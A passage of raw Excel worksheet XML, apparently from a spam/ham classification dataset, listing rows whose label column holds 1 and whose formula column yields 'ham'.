        <v>1</v>
      </c>
      <c r="C1733" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1734" t="s">
        <v>1257</v>
      </c>
      <c r="B1734">
        <v>1</v>
      </c>
      <c r="C1734" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1735" t="s">
        <v>1258</v>
      </c>
      <c r="B1735">
        <v>1</v>
      </c>
      <c r="C1735" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1736" t="s">
        <v>1259</v>
      </c>
      <c r="B1736">
        <v>1</v>
      </c>
      <c r="C1736" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1737" t="s">
        <v>21</v>
      </c>
      <c r="B1737">
        <v>1</v>
      </c>
      <c r="C1737" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1738" t="s">
        <v>1248</v>
      </c>
      <c r="B1738">
        <v>1</v>
      </c>
      <c r="C1738" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1739" t="s">
        <v>1260</v>
      </c>
      <c r="B1739">
        <v>1</v>
      </c>
      <c r="C1739" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1740" t="s">
        <v>1261</v>
      </c>
      <c r="B1740">
        <v>1</v>
      </c>
      <c r="C1740" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1741" t="s">
        <v>1262</v>
      </c>
      <c r="B1741">
        <v>1</v>
      </c>
      <c r="C1741" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1742" t="s">
        <v>21</v>
      </c>
      <c r="B1742">
        <v>1</v>
      </c>
      <c r="C1742" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1743" t="s">
        <v>21</v>
      </c>
      <c r="B1743">
        <v>1</v>
      </c>
      <c r="C1743" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1744" t="s">
        <v>1263</v>
      </c>
      <c r="B1744">
        <v>1</v>
      </c>
      <c r="C1744" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1745" t="s">
        <v>1264</v>
      </c>
      <c r="B1745">
        <v>1</v>
      </c>
      <c r="C1745" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1746" t="s">
        <v>1265</v>
      </c>
      <c r="B1746">
        <v>1</v>
      </c>
      <c r="C1746" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1747" t="s">
        <v>21</v>
      </c>
      <c r="B1747">
        <v>1</v>
      </c>
      <c r="C1747" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1748" t="s">
        <v>1266</v>
      </c>
      <c r="B1748">
        <v>1</v>
      </c>
      <c r="C1748" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1749" t="s">
        <v>1267</v>
      </c>
      <c r="B1749">
        <v>1</v>
      </c>
      <c r="C1749" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1750" t="s">
        <v>1268</v>
      </c>
      <c r="B1750">
        <v>1</v>
      </c>
      <c r="C1750" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1751" t="s">
        <v>1269</v>
      </c>
      <c r="B1751">
        <v>1</v>
      </c>
      <c r="C1751" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1752" t="s">
        <v>1270</v>
      </c>
      <c r="B1752">
        <v>1</v>
      </c>
      <c r="C1752" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1753" t="s">
        <v>1271</v>
      </c>
      <c r="B1753">
        <v>1</v>
      </c>
      <c r="C1753" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1754" t="s">
        <v>1272</v>
      </c>
      <c r="B1754">
        <v>1</v>
      </c>
      <c r="C1754" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1755" t="s">
        <v>1273</v>
      </c>
      <c r="B1755">
        <v>1</v>
      </c>
      <c r="C1755" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1756" t="s">
        <v>1274</v>
      </c>
      <c r="B1756">
        <v>1</v>
      </c>
      <c r="C1756" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1757" t="s">
        <v>1274</v>
      </c>
      <c r="B1757">
        <v>1</v>
      </c>
      <c r="C1757" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1758" t="s">
        <v>21</v>
      </c>
      <c r="B1758">
        <v>1</v>
      </c>
      <c r="C1758" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1759" t="s">
        <v>21</v>
      </c>
      <c r="B1759">
        <v>1</v>
      </c>
      <c r="C1759" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1760" t="s">
        <v>1275</v>
      </c>
      <c r="B1760">
        <v>1</v>
      </c>
      <c r="C1760" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1761" t="s">
        <v>21</v>
      </c>
      <c r="B1761">
        <v>1</v>
      </c>
      <c r="C1761" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1762" t="s">
        <v>1276</v>
      </c>
      <c r="B1762">
        <v>1</v>
      </c>
      <c r="C1762" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1763" t="s">
        <v>1277</v>
      </c>
      <c r="B1763">
        <v>1</v>
      </c>
      <c r="C1763" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1764" t="s">
        <v>1278</v>
      </c>
      <c r="B1764">
        <v>1</v>
      </c>
      <c r="C1764" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1765" t="s">
        <v>1279</v>
      </c>
      <c r="B1765">
        <v>1</v>
      </c>
      <c r="C1765" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1766" t="s">
        <v>21</v>
      </c>
      <c r="B1766">
        <v>1</v>
      </c>
      <c r="C1766" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1767" t="s">
        <v>1280</v>
      </c>
      <c r="B1767">
        <v>1</v>
      </c>
      <c r="C1767" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1768" t="s">
        <v>21</v>
      </c>
      <c r="B1768">
        <v>1</v>
      </c>
      <c r="C1768" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1769" t="s">
        <v>1281</v>
      </c>
      <c r="B1769">
        <v>1</v>
      </c>
      <c r="C1769" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1770" t="s">
        <v>1282</v>
      </c>
      <c r="B1770">
        <v>1</v>
      </c>
      <c r="C1770" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1771" t="s">
        <v>1283</v>
      </c>
      <c r="B1771">
        <v>1</v>
      </c>
      <c r="C1771" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1772" t="s">
        <v>1284</v>
      </c>
      <c r="B1772">
        <v>1</v>
      </c>
      <c r="C1772" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1773" t="s">
        <v>1042</v>
      </c>
      <c r="B1773">
        <v>1</v>
      </c>
      <c r="C1773" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1774" t="s">
        <v>21</v>
      </c>
      <c r="B1774">
        <v>1</v>
      </c>
      <c r="C1774" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1775" t="s">
        <v>1248</v>
      </c>
      <c r="B1775">
        <v>1</v>
      </c>
      <c r="C1775" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1776" t="s">
        <v>1285</v>
      </c>
      <c r="B1776">
        <v>1</v>
      </c>
      <c r="C1776" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1777" t="s">
        <v>1286</v>
      </c>
      <c r="B1777">
        <v>1</v>
      </c>
      <c r="C1777" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1778" t="s">
        <v>21</v>
      </c>
      <c r="B1778">
        <v>1</v>
      </c>
      <c r="C1778" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1779" t="s">
        <v>1287</v>
      </c>
      <c r="B1779">
        <v>1</v>
      </c>
      <c r="C1779" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1780" t="s">
        <v>1288</v>
      </c>
      <c r="B1780">
        <v>1</v>
      </c>
      <c r="C1780" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1781" t="s">
        <v>1289</v>
      </c>
      <c r="B1781">
        <v>1</v>
      </c>
      <c r="C1781" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1782" t="s">
        <v>21</v>
      </c>
      <c r="B1782">
        <v>1</v>
      </c>
      <c r="C1782" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1783" t="s">
        <v>1290</v>
      </c>
      <c r="B1783">
        <v>1</v>
      </c>
      <c r="C1783" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1784" t="s">
        <v>1291</v>
      </c>
      <c r="B1784">
        <v>1</v>
      </c>
      <c r="C1784" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1785" t="s">
        <v>21</v>
      </c>
      <c r="B1785">
        <v>1</v>
      </c>
      <c r="C1785" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1786" t="s">
        <v>1292</v>
      </c>
      <c r="B1786">
        <v>1</v>
      </c>
      <c r="C1786" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1787" t="s">
        <v>1293</v>
      </c>
      <c r="B1787">
        <v>1</v>
      </c>
      <c r="C1787" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1788" t="s">
        <v>1294</v>
      </c>
      <c r="B1788">
        <v>1</v>
      </c>
      <c r="C1788" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1789" t="s">
        <v>21</v>
      </c>
      <c r="B1789">
        <v>1</v>
      </c>
      <c r="C1789" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1790" t="s">
        <v>21</v>
      </c>
      <c r="B1790">
        <v>1</v>
      </c>
      <c r="C1790" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1791" t="s">
        <v>1295</v>
      </c>
      <c r="B1791">
        <v>1</v>
      </c>
      <c r="C1791" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1792" t="s">
        <v>1296</v>
      </c>
      <c r="B1792">
        <v>1</v>
      </c>
      <c r="C1792" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1793" t="s">
        <v>1297</v>
      </c>
      <c r="B1793">
        <v>1</v>
      </c>
      <c r="C1793" t="str">
        <f t="shared" si="27"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1794" t="s">
        <v>1298</v>
      </c>
      <c r="B1794">
        <v>1</v>
      </c>
      <c r="C1794" t="str">
        <f t="shared" ref="C1794:C1857" si="28">IF(B1794="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1795" t="s">
        <v>1299</v>
      </c>
      <c r="B1795">
        <v>1</v>
      </c>
      <c r="C1795" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1796" t="s">
        <v>1300</v>
      </c>
      <c r="B1796">
        <v>1</v>
      </c>
      <c r="C1796" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1797" t="s">
        <v>21</v>
      </c>
      <c r="B1797">
        <v>1</v>
      </c>
      <c r="C1797" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1798" t="s">
        <v>1301</v>
      </c>
      <c r="B1798">
        <v>1</v>
      </c>
      <c r="C1798" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1799" t="s">
        <v>1302</v>
      </c>
      <c r="B1799">
        <v>1</v>
      </c>
      <c r="C1799" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1800" t="s">
        <v>1303</v>
      </c>
      <c r="B1800">
        <v>1</v>
      </c>
      <c r="C1800" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1801" t="s">
        <v>21</v>
      </c>
      <c r="B1801">
        <v>1</v>
      </c>
      <c r="C1801" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1802" t="s">
        <v>1304</v>
      </c>
      <c r="B1802">
        <v>1</v>
      </c>
      <c r="C1802" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1803" t="s">
        <v>21</v>
      </c>
      <c r="B1803">
        <v>1</v>
      </c>
      <c r="C1803" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1804" t="s">
        <v>1305</v>
      </c>
      <c r="B1804">
        <v>1</v>
      </c>
      <c r="C1804" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1805" t="s">
        <v>1306</v>
      </c>
      <c r="B1805">
        <v>1</v>
      </c>
      <c r="C1805" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1806" t="s">
        <v>1307</v>
      </c>
      <c r="B1806">
        <v>1</v>
      </c>
      <c r="C1806" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1807" t="s">
        <v>21</v>
      </c>
      <c r="B1807">
        <v>1</v>
      </c>
      <c r="C1807" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1808" t="s">
        <v>1308</v>
      </c>
      <c r="B1808">
        <v>1</v>
      </c>
      <c r="C1808" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1809" t="s">
        <v>1309</v>
      </c>
      <c r="B1809">
        <v>1</v>
      </c>
      <c r="C1809" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1810" t="s">
        <v>1310</v>
      </c>
      <c r="B1810">
        <v>1</v>
      </c>
      <c r="C1810" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1811" t="s">
        <v>1311</v>
      </c>
      <c r="B1811">
        <v>1</v>
      </c>
      <c r="C1811" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1812" t="s">
        <v>1312</v>
      </c>
      <c r="B1812">
        <v>1</v>
      </c>
      <c r="C1812" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1813" t="s">
        <v>21</v>
      </c>
      <c r="B1813">
        <v>1</v>
      </c>
      <c r="C1813" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1814" t="s">
        <v>21</v>
      </c>
      <c r="B1814">
        <v>1</v>
      </c>
      <c r="C1814" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1815" t="s">
        <v>54</v>
      </c>
      <c r="B1815">
        <v>1</v>
      </c>
      <c r="C1815" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1816" t="s">
        <v>1313</v>
      </c>
      <c r="B1816">
        <v>1</v>
      </c>
      <c r="C1816" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1817" t="s">
        <v>1314</v>
      </c>
      <c r="B1817">
        <v>1</v>
      </c>
      <c r="C1817" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1818" t="s">
        <v>1315</v>
      </c>
      <c r="B1818">
        <v>1</v>
      </c>
      <c r="C1818" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1819" t="s">
        <v>21</v>
      </c>
      <c r="B1819">
        <v>1</v>
      </c>
      <c r="C1819" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1820" t="s">
        <v>1316</v>
      </c>
      <c r="B1820">
        <v>1</v>
      </c>
      <c r="C1820" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1821" t="s">
        <v>1317</v>
      </c>
      <c r="B1821">
        <v>1</v>
      </c>
      <c r="C1821" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1822" t="s">
        <v>1318</v>
      </c>
      <c r="B1822">
        <v>1</v>
      </c>
      <c r="C1822" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1823" t="s">
        <v>21</v>
      </c>
      <c r="B1823">
        <v>1</v>
      </c>
      <c r="C1823" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1824" t="s">
        <v>907</v>
      </c>
      <c r="B1824">
        <v>1</v>
      </c>
      <c r="C1824" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1825" t="s">
        <v>1319</v>
      </c>
      <c r="B1825">
        <v>1</v>
      </c>
      <c r="C1825" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1826" t="s">
        <v>1320</v>
      </c>
      <c r="B1826">
        <v>1</v>
      </c>
      <c r="C1826" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1827" t="s">
        <v>1321</v>
      </c>
      <c r="B1827">
        <v>1</v>
      </c>
      <c r="C1827" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1828" t="s">
        <v>1322</v>
      </c>
      <c r="B1828">
        <v>1</v>
      </c>
      <c r="C1828" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1829" t="s">
        <v>1323</v>
      </c>
      <c r="B1829">
        <v>1</v>
      </c>
      <c r="C1829" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1830" t="s">
        <v>1324</v>
      </c>
      <c r="B1830">
        <v>1</v>
      </c>
      <c r="C1830" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1831" t="s">
        <v>25</v>
      </c>
      <c r="B1831">
        <v>1</v>
      </c>
      <c r="C1831" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1832" t="s">
        <v>1325</v>
      </c>
      <c r="B1832">
        <v>1</v>
      </c>
      <c r="C1832" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1833" t="s">
        <v>1326</v>
      </c>
      <c r="B1833">
        <v>1</v>
      </c>
      <c r="C1833" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1834" t="s">
        <v>1327</v>
      </c>
      <c r="B1834">
        <v>1</v>
      </c>
      <c r="C1834" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1835" t="s">
        <v>1328</v>
      </c>
      <c r="B1835">
        <v>1</v>
      </c>
      <c r="C1835" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1836" t="s">
        <v>1329</v>
      </c>
      <c r="B1836">
        <v>1</v>
      </c>
      <c r="C1836" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1837" t="s">
        <v>1330</v>
      </c>
      <c r="B1837">
        <v>1</v>
      </c>
      <c r="C1837" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1838" t="s">
        <v>1331</v>
      </c>
      <c r="B1838">
        <v>1</v>
      </c>
      <c r="C1838" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1839" t="s">
        <v>1332</v>
      </c>
      <c r="B1839">
        <v>1</v>
      </c>
      <c r="C1839" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1840" t="s">
        <v>115</v>
      </c>
      <c r="B1840">
        <v>1</v>
      </c>
      <c r="C1840" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1841" t="s">
        <v>1333</v>
      </c>
      <c r="B1841">
        <v>1</v>
      </c>
      <c r="C1841" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1842" t="s">
        <v>21</v>
      </c>
      <c r="B1842">
        <v>1</v>
      </c>
      <c r="C1842" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1843" t="s">
        <v>1334</v>
      </c>
      <c r="B1843">
        <v>1</v>
      </c>
      <c r="C1843" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1844" t="s">
        <v>1335</v>
      </c>
      <c r="B1844">
        <v>1</v>
      </c>
      <c r="C1844" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1845" t="s">
        <v>1336</v>
      </c>
      <c r="B1845">
        <v>1</v>
      </c>
      <c r="C1845" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1846" spans="1:3" x14ac:dyDescent="0.3">
